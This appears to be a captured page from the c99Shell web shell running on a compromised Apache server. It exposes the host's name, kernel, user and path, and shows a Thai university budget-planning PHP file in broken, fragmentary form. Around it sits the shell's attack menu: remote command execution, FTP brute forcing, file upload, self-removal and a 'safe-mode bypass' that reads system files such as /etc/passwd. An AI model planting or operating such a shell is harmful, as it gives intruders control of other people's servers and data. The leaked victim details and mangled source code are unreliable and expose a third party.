!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/plan/   drwxr-xr-x
Free 52.39 GB of 127.8 GB (40.99%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     InsertPlaningIn.php (5.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "


กรุณาทำการ Login ก่อน

"; echo ""; exit(); } else { /** Configuration */ require_once( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../include/Function.php" ); require_once( "../include/FunctionDB.php" ); /** Create Database Object */ $dbObj = new DBConn; $flag = true; $msg = ""; /** Input Hidden Form */ $ProjectId = trim( $_POST['ProjectId'] ); $Project_code = trim( $_POST['Project_code'] ); $Faculty_code = trim( $_POST['Faculty_code'] ); $Orderlist = trim( $_POST['Orderlist'] ); $Project_plan = trim( $_POST['Project_plan'] ); $Budget_Year = trim( $_POST['Budget_Year'] ); /** Input Form */ $Training_name = htmlspecialchars( trim( $_POST['Training_name'] ) ); $programId = trim( $_POST['programId'] ); $Year = trim( $_POST['Year'] ); $MoneyS_C = trim( $_POST['MoneyS_C'] ); $MoneyId = trim( $_POST['MoneyId'] ); /** Input Form */ $Teacher_code = trim( $_POST['Teacher_code'] ); $Ind = trim( $_POST['Ind'] ); $Date = trim( $_POST['Date_start'] ); $Budget_use = trim( $_POST['Budget_use'] ); $Training_code = ""; /** Check Input Data */ if( $Training_name == "" ) { $msg .= "
  • กรุณากรอกรายละเอียด แผนดำเนินการ\r\n
    "; $button = ""; $flag = false; } if( $Ind == "" ) { $msg .= "
  • กรุณากรอก ตัวบงชี้ตาม QA\r\n
    "; $button = ""; $flag = false; } if( $Date == "" ) { $msg .= "
  • กรุณากรอก วัน/เดือน/ปี (ที่ดำเนินการ)\r\n
    "; $button = ""; $flag = false; } if( $Budget_use == "" ) { $msg .= "
  • กรุณากรอก จำนวนเงินที่ใช้\r\n
    "; $button = ""; $flag = false; } if( $flag ) { /** Call Function */ //### table --> 'project_tb' InsertProject( $Training_code , $Project_code , $ProjectId , $MoneyId , $MoneyS_C , $Faculty_code , $Teacher_code , $Ind , $Orderlist , $Project_plan , $Training_name , $Date , $Budget_use , $programId , $Budget_Year , $Year ); } } # else ?> ข้อมูลแผนดำเนินงานและรายงาน : ข้อมูลแผนดำเนินการ รายปีงบประมาณ - เพิ่มข้อมูลแผน/โครงการรดำเนินงาน (ข้อย่อย)
     
    หน้าหลัก » ข้อมูลแผนดำเนินงาน » รายงานการใช้เงินตามข้อย่อยแผน » เพิ่มข้อมูลแผน/โครงการรดำเนินงาน (ข้อย่อย)
     
    ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว
    กรุณารอส้กครู่ กำลังเปลี่ยนหน้าอัตโนมัติ
    "; ?>
     
    freeresult($result); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?>
    bool(false)

  • :: Command execute ::

    Enter:
     
    Select:
     

    :: Shadow's tricks :D ::

    Useful Commands
     
    Warning. Kernel may be alerted using higher levels
    Kernel Info:

    :: Preddy's tricks :D ::

    Php Safe-Mode Bypass (Read Files)

    File:

    eg: /etc/passwd

    Php Safe-Mode Bypass (List Directories):

    Dir:

    eg: /etc/

    :: Search ::
      - regexp 

    :: Upload ::
     
    [ Read-Only ]

    :: Make Dir ::
     
    [ Read-Only ]
    :: Make File ::
     
    [ Read-Only ]

    :: Go Dir ::
     
    :: Go File ::
     

    --[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--